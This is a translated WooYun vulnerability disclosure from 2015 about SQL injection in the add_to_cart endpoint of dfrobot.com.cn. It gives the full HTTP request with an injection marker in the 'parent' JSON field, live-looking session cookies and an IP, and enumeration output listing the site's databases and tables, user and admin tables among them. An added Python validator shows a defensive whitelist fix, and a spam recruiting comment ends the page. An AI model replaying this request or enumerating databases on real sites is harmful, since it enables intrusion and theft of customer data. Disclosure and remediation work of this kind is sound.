
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0159383

Title: SQL injection vulnerability in the main WWW site of the DFRobot maker community

Affected vendor: dfrobot.com.cn

Author: 深度安全实验室

Submitted: 2015-12-08 16:35

Fix time: 2015-12-13 16:36

Disclosed: 2015-12-13 16:36

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Vendor notified, but the vendor ignored the vulnerability

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-12-08: Details sent to the vendor, awaiting vendor handling
2015-12-13: Vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

Detailed description:

POST /flow.php?step=add_to_cart HTTP/1.1
Content-Length: 251
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.dfrobot.com.cn
Cookie: jteU_2132_saltkey=Ex2L22YY; jteU_2132_lastvisit=1449525559; jteU_2132_sid=tFbxPF; jteU_2132_lastact=1449534410%09member.php%09logging; real_ipd=124.114.79.150; ECS_ID=0730117d7c02421ff20433ad303c8f2af291b35d; ECS[visit_times]=1; jteU_2132_st_p=0%7C1449529116%7C3cb5bbce4164d0866662a404ee5125cf; jteU_2132_visitedfid=92D100; jteU_2132_viewid=tid_12771; jteU_2132_st_t=0%7C1449529118%7C55bfa02338372c10bf2c32612ec7e27a; jteU_2132_forum_lastvisit=D_100_1449529116D_92_1449529118; jteU_2132_home_diymode=1; jteU_2132_home_readfeed=1449529108; jteU_2132_con_request_token=16129543614185153029; jteU_2132_con_request_token_secret=jfeFgifTC2xxg85G; jteU_2132_sendmail=1; ECS[display]=grid; ECS[history]=1207%2C980%2C1178%2C1202%2C1070; jteU_2132__refer=%252Fcommunity%252Fhome.php%253Fac%253Dfeed%2526feedid%253D355%2526mod%253Dspacecp; jteU_2132_connect_not_sync_feed=1; jteU_2132_connect_not_sync_t=1; jteU_2132_onlineusernum=29; onlineipd=124.114.79.150; pgv_pvi=4888092800; pgv_info=ssi=s7710268100; jteU_2132_saltkey=Ex2L22YY; jteU_2132_lastvisit=1449525559; jteU_2132_sid=i153TH; jteU_2132_lastact=1449529159%09home.php%09misc; jteU_2132_sendmail=1; pgv_pvi=4888092800; pgv_info=ssi=s7710268100; _ga=GA1.3.231402864.1449529165; _gat=1; ftwwwdfrobotcomcn=1; jteU_2132_atarget=1; user_id=0; v="2015120807071400034612700162383880|::"; opxPID=2015120807071400034612700162383880; u=1449529634346|1449529634346|1449529634346|1449529634346|1449529634346|1449529634346|1449529634346|1449529634346|1449529634346|1449529634346|1449529634346|1449529634346|1449529634346|; JSESSIONID=99697C8A87FA0E827DE913F8CB98A574; bdshare_firstime=1449532644549; BAIDUID=6FBC214DA55BD5FED3308299A9D92969:FG=1
Host: www.dfrobot.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
goods=%7b%22goods_id%22:554%2c%22number%22:2%2c%22parent%22:%22*%22%2c%22quick%22:1%2c%22spec%22:%5b%5d%7d
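Added example, not part of the original report: a whitelist validator for the `goods` parameter that the request above submits to `flow.php?step=add_to_cart`. The request in the report carries the string "*" in `parent` where only an integer belongs; the validator accepts only integers in every field and then hands the validated id to the `ecs_goods` lookup as a bound parameter. The allowed key set and the range limits are assumptions.

```python
import json
from urllib.parse import unquote_plus
# Constructed samples: CLEAN_BODY is an ordinary add_to_cart body; MARKED_BODY is
# the body from the report above, where "parent" carries the string "*".
CLEAN_BODY = 'goods=%7b%22goods_id%22:554%2c%22number%22:2%2c%22parent%22:0%2c%22quick%22:1%2c%22spec%22:%5b%5d%7d'
MARKED_BODY = 'goods=%7b%22goods_id%22:554%2c%22number%22:2%2c%22parent%22:%22*%22%2c%22quick%22:1%2c%22spec%22:%5b%5d%7d'
ALLOWED_KEYS = {'goods_id', 'number', 'parent', 'quick', 'spec'}

class BadGoodsParam(ValueError):
    """The goods parameter does not match the whitelisted shape."""

def _as_int(value, lo, hi, name):
    # Genuine integers only: bool is excluded and numeric strings are refused.
    if isinstance(value, bool) or not isinstance(value, int) or not lo <= value <= hi:
        raise BadGoodsParam(f'{name} must be an integer in [{lo}, {hi}]')
    return value

def parse_goods_param(body):
    """Decode the form body and validate the JSON goods object field by field."""
    fields = dict(p.split('=', 1) for p in body.split('&') if '=' in p)
    if 'goods' not in fields:
        raise BadGoodsParam('missing goods field')
    try:
        goods = json.loads(unquote_plus(fields['goods']))
    except json.JSONDecodeError:
        raise BadGoodsParam('goods is not valid JSON') from None
    if not isinstance(goods, dict) or set(goods) - ALLOWED_KEYS:
        raise BadGoodsParam('goods must be an object with only the known keys')
    spec = goods.get('spec', [])
    if not isinstance(spec, list):
        raise BadGoodsParam('spec must be a list')
    # Range limits are assumptions; the point is that every value is an int.
    return {
        'goods_id': _as_int(goods.get('goods_id'), 1, 2**31 - 1, 'goods_id'),
        'number': _as_int(goods.get('number'), 1, 10000, 'number'),
        'parent': _as_int(goods.get('parent', 0), 0, 2**31 - 1, 'parent'),
        'quick': _as_int(goods.get('quick', 0), 0, 1, 'quick'),
        'spec': [_as_int(s, 1, 2**31 - 1, 'spec') for s in spec],
    }

def validate_body(body):
    """Return (True, parsed) for an acceptable body, (False, reason) otherwise."""
    try:
        return True, parse_goods_param(body)
    except BadGoodsParam as exc:
        return False, str(exc)

def cart_lookup_query(goods):
    # Bound query: the validated id travels as a parameter, never as SQL text.
    return 'SELECT * FROM ecs_goods WHERE goods_id = ?', (goods['goods_id'],)
```

Rejecting the body before any query is built is the server-side fix; the same check run over request logs flags bodies where a numeric field arrives as a string.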

Proof of vulnerability:

(screenshot: 1.png)

Database: dfrobotcomcnv2
+-------------------------+---------+
| Table | Entries |
+-------------------------+---------+
| ecs_stats | 912749 |
| ecs_member_price | 324664 |
| ecs_keywords | 271441 |
| ecs_order_action | 33150 |
| ecs_order_goods | 23566 |
| ecs_delivery_goods | 21433 |
| ecs_admin_log | 14031 |
| ecs_sessions_data | 13686 |
| ecs_pay_log | 10414 |
| ecs_order_info | 9965 |
| ecs_account_log | 9823 |
| ecs_delivery_order | 8993 |
| ecs_users | 8328 |
| ecs_user_address | 4668 |
| ecs_link_goods | 4551 |
| ecs_goods_gallery | 3585 |
| ecs_region | 3408 |
| ecs_user_bonus | 3292 |
| ecs_goods_cat | 2942 |
| ecs_searchengine | 2835 |
| ecs_search_words | 2629 |
| wxch_message | 2243 |
| ecs_cart | 2121 |
| ecs_collect_goods | 1894 |
| ecs_wishlist | 1668 |
| ecs_goods | 1073 |
| ecs_adsense | 1040 |
| ecs_email_sendlist | 894 |
| discount | 842 |
| ecs_feedback | 792 |
| wxch_user | 445 |
| ecs_wishlist_info | 322 |
| ecs_zxcomment | 288 |
| ecs_area_region | 203 |
| ecs_group_goods | 201 |
| ecs_shop_config | 180 |
| ecs_touch_shop_config | 180 |
| ecs_booking_goods | 155 |
| ecs_sessions | 155 |
| ecs_admin_action | 110 |
| ecs_category | 99 |
| ecs_tag | 69 |
| ecs_ad_position | 65 |
| ecs_bonus_type | 56 |
| wxch_point_record | 56 |
| ecs_template | 38 |
| ecs_article | 37 |
| ecs_cat_recommend | 31 |
| ecs_free_shipping | 29 |
| ecs_nav | 28 |
| ecs_user_account | 27 |
| ecs_comment | 24 |
| wxch_prize_append | 24 |
| ecs_brand | 23 |
| ecs_ad | 18 |
| wxch_menu | 18 |
| ecs_admin_user | 15 |
| ecs_shipping_area | 15 |
| ecs_touch_shipping_area | 15 |
| ecs_mail_templates | 14 |
| wxch_lang | 12 |
| wxch_msg | 12 |
| ecs_favourable_activity | 11 |
| ecs_goods_article | 10 |
| wxch_cfg | 10 |
| wxch_keywords_article | 10 |
| ecs_article_cat | 9 |
| ecs_user_rank | 9 |
| ecs_volume_price | 9 |
| wxch_point | 9 |
| ecs_touch_nav | 8 |
| ecs_payment | 7 |
| ecs_reg_fields | 6 |
| ecs_back_goods | 5 |
| ecs_goods_attr | 5 |
| ecs_shipping | 5 |
| ecs_touch_payment | 5 |
| ecs_touch_shipping | 5 |
| ecs_vote_option | 4 |
| wxch_prize_cnum | 4 |
| ecs_goods_activity | 3 |
| wxch_order | 3 |
| wxch_prize | 3 |
| ecs_attribute | 2 |
| ecs_exchange_goods | 2 |
| ecs_goods_type | 2 |
| ecs_topic | 2 |
| ecs_auto_manage | 1 |
| ecs_back_order | 1 |
| ecs_crons | 1 |
| ecs_touch_ad | 1 |
| ecs_touch_ad_position | 1 |
| ecs_vote | 1 |
| ecs_vote_log | 1 |
| wxch_config | 1 |
| wxch_coupon | 1 |
| wxch_keywords | 1 |
| wxch_oauth | 1 |
| wxch_pay | 1 |
| wxch_prize_count | 1 |
| wxch_ver | 1 |
+-------------------------+---------+


Database: df_discuz
+-----------------------------------+---------+
| Table | Entries |
+-----------------------------------+---------+
| pre_forum_post | 45222 |
| pre_common_district | 45051 |
| pre_forum_filter_post | 30372 |
| pre_forum_statlog | 26345 |
| pre_forum_threadpartake | 23710 |
| pre_ucenter_feeds | 23385 |
| pre_home_notification | 19809 |
| pre_forum_attachment | 18186 |
| pre_common_credit_rule_log | 17631 |
| pre_ucenter_memberfields | 13626 |
| pre_ucenter_members | 13529 |
| pre_forum_thread | 12640 |
| pre_common_member_count | 8602 |
| pre_common_member_field_forum | 8602 |
| pre_common_member_field_home | 8602 |
| pre_common_member_profile | 8602 |
| pre_common_member_status | 8602 |
| pre_common_member | 8600 |
| pre_common_onlinetime | 5557 |
| pre_common_tagitem | 4748 |
| pre_common_member_newprompt | 4071 |
| pre_dsu_paulsign | 3620 |
| pre_forum_memberrecommend | 3196 |
| pre_common_block_pic | 3030 |
| pre_mobile_wsq_threadlist | 2674 |
| pre_connect_memberbindlog | 2523 |
| pre_common_block_item | 2445 |
| pre_forum_threadimage | 2436 |
| pre_common_member_connect | 2395 |
| pre_home_pic | 2332 |
| pre_common_tag | 2064 |
| pre_forum_attachment_8 | 2054 |
| pre_forum_attachment_0 | 1974 |
| pre_forum_attachment_1 | 1895 |
| pre_forum_attachment_7 | 1887 |
| pre_forum_attachment_5 | 1833 |
| pre_forum_modwork | 1812 |
| pre_connect_postfeedlog | 1783 |
| pre_forum_attachment_6 | 1701 |
| pre_ucenter_mergemembers | 1678 |
| pre_forum_attachment_3 | 1676 |
| pre_forum_threadaddviews | 1669 |
| pre_forum_sofa | 1622 |
| pre_forum_attachment_2 | 1612 |
| pre_forum_attachment_9 | 1611 |
| pre_common_connect_guest | 1583 |
| pre_ucenter_pm_indexes | 1501 |
| pre_forum_attachment_4 | 1472 |
| pre_forum_threadmod | 1388 |
| pre_common_mytask | 1260 |
| pre_common_stat | 1255 |
| pre_common_credit_log | 1150 |
| pre_common_credit_log_field | 1146 |
| pre_forum_threadpreview | 930 |
| pre_ucenter_pm_members | 922 |
| pre_home_follow_feed_archiver | 886 |
| pre_home_favorite | 863 |
| pre_forum_post_tableid | 836 |
| pre_forum_threadhot | 822 |
| pre_forum_threadcalendar | 649 |
| pre_forum_hotreply_member | 586 |
| pre_ucenter_pm_lists | 469 |
| pre_plugin_lj_sina | 462 |
| pre_common_setting | 457 |
| pre_forum_rsscache | 455 |
| pre_common_stylevar | 452 |
| pre_common_block | 416 |
| pre_forum_attachment_unused | 415 |
| pre_connect_feedlog | 411 |
| pre_home_follow | 401 |
| pre_home_friend | 394 |
| pre_forum_hotreply_number | 328 |
| pre_forum_pollvoter | 285 |
| pre_home_doing | 283 |
| pre_forum_postcomment | 254 |
| pre_common_smiley | 200 |
| pre_common_magiclog | 195 |
| pre_connect_tthreadlog | 194 |
| pre_common_template_block | 182 |
| pre_common_syscache | 173 |
| pre_home_friendlog | 173 |
| pre_ucenter_pm_messages_0 | 172 |
| pre_ucenter_pm_messages_6 | 166 |
| pre_forum_medallog | 165 |
| pre_ucenter_pm_messages_2 | 162 |
| pre_common_searchindex | 161 |
| pre_home_blog | 159 |
| pre_home_blogfield | 159 |
| pre_ucenter_pm_messages_9 | 157 |
| pre_common_member_action_log | 156 |
| pre_ucenter_newpm | 155 |
| pre_common_member_medal | 154 |
| pre_ucenter_pm_messages_1 | 154 |
| pre_ucenter_pm_messages_3 | 152 |
| pre_forum_postcache | 151 |
| pre_home_comment | 151 |
| pre_common_member_crime | 140 |
| pre_ucenter_pm_messages_7 | 140 |
| pre_ucenter_pm_messages_4 | 139 |
| pre_forum_spacecache | 136 |
| pre_ucenter_pm_messages_8 | 134 |
| pre_common_credit_rule_log_field | 129 |
| pre_ucenter_pm_messages_5 | 125 |
| pre_security_evilpost | 123 |
| pre_common_statuser | 114 |
| pre_common_block_style | 109 |
| pre_forum_poststick | 109 |
| pre_forum_threadclass | 99 |
| pre_common_pluginvar | 95 |
| pre_home_share | 93 |
| pre_home_album | 87 |
| pre_forum_newthread | 73 |
| pre_dfrobot_tutorial | 70 |
| pre_forum_polloption | 69 |
| pre_common_admincp_perm | 68 |
| pre_hardware_tokens | 68 |
| pre_forum_forumfield | 66 |
| pre_forum_forum | 65 |
| pre_common_nav | 61 |
| pre_common_session | 57 |
| pre_common_member_profile_setting | 51 |
| pre_home_friend_request | 50 |
| pre_home_feed | 47 |
| pre_forum_threaddisablepos | 46 |
| pre_hardware_info | 42 |
| pre_home_pokearchive | 37 |
| pre_common_optimizer | 36 |
| pre_common_credit_rule | 33 |
| pre_forum_debatepost | 33 |
| pre_ucenter_settings | 29 |
| pre_security_eviluser | 28 |
| pre_common_usergroup | 27 |
| pre_common_usergroup_field | 27 |
| pre_home_picfield | 27 |
| pre_common_cache | 26 |
| pre_common_diy_data | 26 |
| pre_common_magic | 24 |
| pre_hardware_query | 24 |
| pre_common_word | 23 |
| pre_common_myapp | 21 |
| pre_common_plugin | 21 |
| pre_forum_replycredit | 21 |
| pre_common_cron | 20 |
| pre_forum_attachtype | 20 |
| pre_comeing_touch | 19 |
| pre_forum_activityapply | 19 |
| pre_forum_forumrecommend | 19 |
| pre_forum_moderator | 18 |
| pre_common_member_secwhite | 17 |
| pre_forum_medal | 17 |
| pre_forum_poll | 17 |
| pre_common_member_magic | 16 |
| pre_common_seccheck | 16 |
| pre_home_click | 15 |
| pre_common_report | 14 |
| pre_common_failedip | 11 |
| pre_forum_onlinelist | 10 |
| pre_dsu_paulsignemot | 9 |
| pre_forum_promotion | 9 |
| pre_home_poke | 9 |
| pre_home_show | 9 |
| pre_common_admingroup | 8 |
| pre_common_style | 8 |
| pre_common_template | 8 |
| pre_ucenter_notelist | 8 |
| pre_common_friendlink | 7 |
| pre_forum_collection | 7 |
| pre_forum_collectionthread | 7 |
| pre_ucenter_vars | 7 |
| pre_common_task | 6 |
| pre_common_taskvar | 6 |
| pre_forum_typeoption | 6 |
| pre_home_docomment | 6 |
| pre_common_admincp_group | 5 |
| pre_common_admincp_member | 5 |
| pre_common_block_item_data | 5 |
| pre_forum_imagetype | 5 |
| pre_forum_threadclosed | 5 |
| pre_home_class | 5 |
| pre_common_block_favorite | 4 |
| pre_forum_bbcode | 4 |
| pre_portal_article_content | 4 |
| pre_portal_article_count | 4 |
| pre_portal_category | 4 |
| pre_common_admincp_cmenu | 3 |
| pre_forum_activity | 3 |
| pre_forum_collectionrelated | 3 |
| pre_forum_grouplevel | 3 |
| pre_home_clickuser | 3 |
| pre_home_follow_feed | 3 |
| pre_portal_topic | 3 |
| pre_common_failedlogin | 2 |
| pre_common_member_log | 2 |
| pre_common_patch | 2 |
| pre_common_process | 2 |
| pre_common_secquestion | 2 |
| pre_common_word_type | 2 |
| pre_forum_access | 2 |
| pre_forum_warning | 2 |
| pre_mobile_setting | 2 |
| pre_portal_article_title | 2 |
| pre_portal_article_trash | 2 |
| pre_portal_rsscache | 2 |
| pre_ucenter_applications | 2 |
| pre_common_admincp_session | 1 |
| pre_common_advertisement | 1 |
| pre_common_member_wechatmp | 1 |
| pre_dsu_paulsignset | 1 |
| pre_forum_collectioncomment | 1 |
| pre_forum_debate | 1 |
| pre_forum_threadprofile | 1 |
| pre_ucenter_admins | 1 |
| pre_ucenter_failedlogins | 1 |
| pre_ucenter_friends | 1 |
+-----------------------------------+---------+

Fix recommendation:

Copyright notice: when reposting, credit the source 深度安全实验室@乌云


Vulnerability response

Vendor response:

Severity: No impact, vendor ignored

Ignored at: 2015-12-13 16:36

Vendor reply:

Vulnerability Rank: 20 (WooYun assessment)

Latest status:

None yet


Comments:

  1. 2015-12-08 20:25 | VMApire ( Passer-by | Rank:6 Vulnerabilities:1 | ★财神网络★ welcomes all experts to join)

    Hiring at high pay: technical experts of all kinds [everyone welcome to inquire] kkjk.net